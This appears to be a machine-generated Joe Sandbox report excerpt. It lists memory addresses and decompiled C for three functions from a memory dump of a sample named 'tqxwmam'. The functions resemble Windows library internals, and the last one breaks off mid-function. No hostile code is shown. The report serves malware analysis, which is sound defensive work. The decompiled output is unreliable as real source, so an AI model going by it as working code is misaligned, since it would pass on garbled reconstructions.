                                                    0x00b053bf
                                                    0x00b053bf
                                                    0x00b05375
                                                    0x00b05396
                                                    0x00b053a0
                                                    0x00b053a0
                                                    0x00000000
                                                    0x00b05396
                                                    0x00b05377
                                                    0x00b05379
                                                    0x00b0537f
                                                    0x00b0538c
                                                    0x00b05390
                                                    0x00000000
                                                    0x00b05390
                                                    0x00b051ee
                                                    0x00b051f1
                                                    0x00b05301
                                                    0x00b05310
                                                    0x00b05315
                                                    0x00b05318
                                                    0x00b0531b
                                                    0x00b05320
                                                    0x00b0532e
                                                    0x00b05331
                                                    0x00000000
                                                    0x00b05331
                                                    0x00b05328
                                                    0x00b05329
                                                    0x00000000
                                                    0x00b05329
                                                    0x00b051fa
                                                    0x00b05235
                                                    0x00b05236
                                                    0x00b05239
                                                    0x00b0523f
                                                    0x00b05240
                                                    0x00b05241
                                                    0x00b05242
                                                    0x00b05246
                                                    0x00b05247
                                                    0x00b0524e
                                                    0x00b05251
                                                    0x00b05267
                                                    0x00b05269
                                                    0x00b0526e
                                                    0x00b0527d
                                                    0x00b0527e
                                                    0x00b05281
                                                    0x00b05282
                                                    0x00b05287
                                                    0x00b05288
                                                    0x00b0528a
                                                    0x00b0528f
                                                    0x00b05294
                                                    0x00000000
                                                    0x00000000
                                                    0x00b0529a
                                                    0x00b0529c
                                                    0x00b0529e
                                                    0x00b0529e
                                                    0x00b052a4
                                                    0x00b052b0
                                                    0x00000000
                                                    0x00000000
                                                    0x00b052ba
                                                    0x00b052bc
                                                    0x00b052bc
                                                    0x00b052d4
                                                    0x00b052d9
                                                    0x00b052dc
                                                    0x00b052e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00b052e7
                                                    0x00b052f4
                                                    0x00000000
                                                    0x00b052f4
                                                    0x00b05270
                                                    0x00000000
                                                    0x00b05270
                                                    0x00b051fc
                                                    0x00b051fd
                                                    0x00b05202
                                                    0x00b05203
                                                    0x00b05205
                                                    0x00b0520a
                                                    0x00b0520f
                                                    0x00000000
                                                    0x00000000
                                                    0x00b0521b
                                                    0x00b05226
                                                    0x00b0522b
                                                    0x00b0521d
                                                    0x00b0521d
                                                    0x00b05222
                                                    0x00b05222
                                                    0x00b0522d
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 4bb24790730fb052ea963611a251475d0c7701d282c5005bb8ad6a3ed5e67b52
                                                    • Instruction ID: 59a5c87830d5473cc469e56d8d42a48cc8f95eabe64aa49a768275807d031c2b
                                                    • Opcode Fuzzy Hash: 4bb24790730fb052ea963611a251475d0c7701d282c5005bb8ad6a3ed5e67b52
                                                    • Instruction Fuzzy Hash: 55517071A00A189FDB24DFA8C980BAEBBF8FF44740F1444ADE55AEB691D7719900CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00A8B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xb5f7a8);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00ADD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00ACD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00ACF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00ADDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00ACB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00ACB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00ACE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00ACA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                    0x00a8b171
                                                    0x00a8b171
                                                    0x00a8b171
                                                    0x00a8b171
                                                    0x00a8b171
                                                    0x00a8b176
                                                    0x00a8b17b
                                                    0x00a8b180
                                                    0x00a8b186
                                                    0x00a8b18f
                                                    0x00a8b198
                                                    0x00a8b1a4
                                                    0x00a8b1aa
                                                    0x00ae4802
                                                    0x00ae4802
                                                    0x00ae4805
                                                    0x00ae480c
                                                    0x00ae480e
                                                    0x00a8b1d1
                                                    0x00a8b1d3
                                                    0x00a8b1de
                                                    0x00a8b1de
                                                    0x00ae4817
                                                    0x00ae481e
                                                    0x00ae4820
                                                    0x00ae4822
                                                    0x00ae4822
                                                    0x00ae4824
                                                    0x00ae4824
                                                    0x00ae482a
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae4835
                                                    0x00ae483a
                                                    0x00ae483d
                                                    0x00ae483f
                                                    0x00ae4842
                                                    0x00ae4842
                                                    0x00ae4842
                                                    0x00ae4846
                                                    0x00ae484c
                                                    0x00ae484e
                                                    0x00ae4851
                                                    0x00ae4851
                                                    0x00ae4853
                                                    0x00ae4854
                                                    0x00ae4854
                                                    0x00ae4858
                                                    0x00ae485a
                                                    0x00ae485a
                                                    0x00ae485d
                                                    0x00ae485f
                                                    0x00ae4861
                                                    0x00ae4861
                                                    0x00ae4866
                                                    0x00ae486b
                                                    0x00ae486e
                                                    0x00ae4871
                                                    0x00ae4876
                                                    0x00ae4876
                                                    0x00ae4878
                                                    0x00ae487b
                                                    0x00ae4884
                                                    0x00ae4884
                                                    0x00000000
                                                    0x00ae487d
                                                    0x00ae487d
                                                    0x00ae4882
                                                    0x00ae4889
                                                    0x00ae4889
                                                    0x00ae488f
                                                    0x00ae4891
                                                    0x00ae48e0
                                                    0x00ae48e2
                                                    0x00ae48e4
                                                    0x00ae48e4
                                                    0x00ae48e7
                                                    0x00ae48e7
                                                    0x00ae48ed
                                                    0x00ae48f4
                                                    0x00ae48f6
                                                    0x00ae4951
                                                    0x00ae4951
                                                    0x00ae4953
                                                    0x00ae4953
                                                    0x00ae4956
                                                    0x00ae4956
                                                    0x00ae4958
                                                    0x00ae4959
                                                    0x00ae4959
                                                    0x00ae495d
                                                    0x00ae495d
                                                    0x00ae495f
                                                    0x00ae495f
                                                    0x00ae4965
                                                    0x00ae4969
                                                    0x00ae49ba
                                                    0x00ae49ba
                                                    0x00ae49c1
                                                    0x00ae49c5
                                                    0x00ae49cc
                                                    0x00ae49d4
                                                    0x00ae49d7
                                                    0x00ae49da
                                                    0x00ae49e4
                                                    0x00ae49e5
                                                    0x00ae49f3
                                                    0x00ae4a02
                                                    0x00000000
                                                    0x00ae4a02
                                                    0x00ae4972
                                                    0x00ae4974
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae4976
                                                    0x00ae4979
                                                    0x00ae4982
                                                    0x00ae4983
                                                    0x00ae4984
                                                    0x00ae498b
                                                    0x00ae498d
                                                    0x00ae4991
                                                    0x00ae4993
                                                    0x00ae4999
                                                    0x00ae499d
                                                    0x00ae49a2
                                                    0x00ae49a2
                                                    0x00ae49a2
                                                    0x00ae4999
                                                    0x00ae49ac
                                                    0x00000000
                                                    0x00ae49b3
                                                    0x00ae48f8
                                                    0x00ae48fe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae48fe
                                                    0x00ae4895
                                                    0x00ae489c
                                                    0x00ae48ad
                                                    0x00ae48b2
                                                    0x00ae48b5
                                                    0x00ae48b7
                                                    0x00ae48ba
                                                    0x00ae48bc
                                                    0x00ae48c6
                                                    0x00ae48c6
                                                    0x00ae48cb
                                                    0x00ae48d1
                                                    0x00ae48d4
                                                    0x00ae48d8
                                                    0x00ae48d8
                                                    0x00000000
                                                    0x00ae48d8
                                                    0x00ae48be
                                                    0x00ae48c0
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae48c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae48c4
                                                    0x00000000
                                                    0x00ae4882
                                                    0x00ae487b
                                                    0x00ae4904
                                                    0x00ae4906
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae4908
                                                    0x00ae490e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae4910
                                                    0x00ae4917
                                                    0x00ae4917
                                                    0x00000000
                                                    0x00ae4917
                                                    0x00a8b1ba
                                                    0x00ae47f9
                                                    0x00ae47fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae47fc
                                                    0x00a8b1c0
                                                    0x00a8b1c0
                                                    0x00a8b1c3
                                                    0x00a8b1cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: 2fabaf598a38f9fe285ef99159d002af18d5972acb84b47a8f12c1191c060408
                                                    • Instruction ID: 2e019ee06b70b51ea05bec25f193bcf580778184b8a7502eee734b24211da1e4
                                                    • Opcode Fuzzy Hash: 2fabaf598a38f9fe285ef99159d002af18d5972acb84b47a8f12c1191c060408
                                                    • Instruction Fuzzy Hash: AF51F071D002998EDB30DF69C945BAEBBB5AF08710F2042ADE859AB282D7354D41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AAB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00AAB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xb7d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00AA7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00B58CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00AC9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00ACB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00ACCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00AA7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00B58F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00ACAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xb78628; // 0x0
								_v68 = _t77;
								_t78 =  *0xb7862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xb78628; // 0x0
							_t116 =  *0xb7862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                    0x00aab94c
                                                    0x00aab956
                                                    0x00aab95c
                                                    0x00aab95e
                                                    0x00aab964
                                                    0x00aab969
                                                    0x00aab96d
                                                    0x00aab96d
                                                    0x00aab970
                                                    0x00aab974
                                                    0x00aab97a
                                                    0x00aabadf
                                                    0x00aabadf
                                                    0x00aabae2
                                                    0x00aabae4
                                                    0x00aabae6
                                                    0x00aabaf0
                                                    0x00af2cb8
                                                    0x00aabaf6
                                                    0x00aabaf6
                                                    0x00aabaf6
                                                    0x00aabafd
                                                    0x00aabb1f
                                                    0x00aabb1f
                                                    0x00aabaff
                                                    0x00aabb00
                                                    0x00aabb00
                                                    0x00aabb03
                                                    0x00aabb03
                                                    0x00aabacb
                                                    0x00aabacf
                                                    0x00aabad0
                                                    0x00aabad1
                                                    0x00aabadc
                                                    0x00aabadc
                                                    0x00aab980
                                                    0x00aab980
                                                    0x00aab988
                                                    0x00aab98b
                                                    0x00aab98d
                                                    0x00aab990
                                                    0x00aab993
                                                    0x00aab999
                                                    0x00aab99b
                                                    0x00aab9a1
                                                    0x00aab9a5
                                                    0x00aab9aa
                                                    0x00aab9b0
                                                    0x00aab9bb
                                                    0x00aab9c0
                                                    0x00aab9c3
                                                    0x00aab9ca
                                                    0x00aab9cc
                                                    0x00aab9cf
                                                    0x00aab9d3
                                                    0x00aab9d7
                                                    0x00aaba94
                                                    0x00aaba94
                                                    0x00aaba98
                                                    0x00aabaa3
                                                    0x00af2ccb
                                                    0x00aabaa9
                                                    0x00aabaa9
                                                    0x00aabaa9
                                                    0x00aabab1
                                                    0x00af2cd5
                                                    0x00af2cdd
                                                    0x00af2cdd
                                                    0x00aababb
                                                    0x00aababc
                                                    0x00aabac2
                                                    0x00aabac3
                                                    0x00aabac3
                                                    0x00aabac6
                                                    0x00000000
                                                    0x00aab9dd
                                                    0x00aab9dd
                                                    0x00aab9e7
                                                    0x00aab9e7
                                                    0x00aab9ec
                                                    0x00aab9ec
                                                    0x00aab9f1
                                                    0x00aab9f5
                                                    0x00aab9fa
                                                    0x00aaba00
                                                    0x00aaba0c
                                                    0x00aaba10
                                                    0x00aaba10
                                                    0x00aaba12
                                                    0x00aaba18
                                                    0x00000000
                                                    0x00000000
                                                    0x00aabb26
                                                    0x00aabb26
                                                    0x00aaba1e
                                                    0x00aaba1e
                                                    0x00aaba23
                                                    0x00aaba25
                                                    0x00aaba2c
                                                    0x00aaba30
                                                    0x00aaba35
                                                    0x00aaba35
                                                    0x00aaba41
                                                    0x00aaba46
                                                    0x00aaba4c
                                                    0x00aaba50
                                                    0x00aaba54
                                                    0x00aaba6a
                                                    0x00aaba6e
                                                    0x00aaba70
                                                    0x00aaba74
                                                    0x00aaba78
                                                    0x00aaba7a
                                                    0x00aaba7c
                                                    0x00aaba8e
                                                    0x00aaba90
                                                    0x00aaba92
                                                    0x00aabb14
                                                    0x00aabb14
                                                    0x00aabb16
                                                    0x00aabb16
                                                    0x00000000
                                                    0x00aaba7c
                                                    0x00aabb0a
                                                    0x00aabb0d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aabb0f

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AAB9A5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: a2b146e50f83a183fe7f55b864158ba2ba1de878a87bfa5b26815959f7d20255
                                                    • Instruction ID: 0a6a56be53b0f94b2b619f414ab2a90b8071ac8a38d19799ad476faf3005d5bb
                                                    • Opcode Fuzzy Hash: a2b146e50f83a183fe7f55b864158ba2ba1de878a87bfa5b26815959f7d20255
                                                    • Instruction Fuzzy Hash: 7E513671618340CFC720CF69C580A2BBBE5BB89750F24496EF98597396DB31EC44CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 81%
                                                    			E00AB2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200231, char _a1546911911) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				void* _t248;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				intOrPtr _t284;
				signed int _t286;
				signed int _t288;
				void* _t289;
				void* _t290;
				signed int _t291;
				unsigned int _t294;
				signed int _t298;
				void* _t299;
				signed int _t300;
				signed int _t304;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0xb7d360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0xb7b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t294 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t326 = 0;
				_v37 = _t314;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L00AA4620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t314 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t284;
							_t286 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t314 - 0xb78478;
								 *_t333 = ((0 | _t314 == 0x00b78478) - 0x00000001 & 0xfffffffb) + 7;
								E00ACF3E0(_t328,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t341 = _t341 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E00B139F2(_t328);
									_t314 = _v32;
									_t328 = _t278;
								}
							}
							_t298 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t288 = _t333 + _t286 * 4;
								_v56 = _t288;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t243 =  *(_v60 + _t298 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t288 =  *(_v60 + _t298 * 4);
										 *(_t288 + 0x18) = _t328;
										_t247 =  *(_v60 + _t298 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M00AB2959))) {
												case 0:
													__ax =  *0xb78488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00ACF3E0(__edi,  *0xb7848c, __ax & 0x0000ffff);
														__eax =  *0xb78488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00ACF3E0(_t328, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0xb78480 & 0x0000ffff = E00ACF3E0(__edi,  *0xb78484,  *0xb78480 & 0x0000ffff);
													__eax =  *0xb78480 & 0x0000ffff;
													__eax = ( *0xb78480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00ACF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
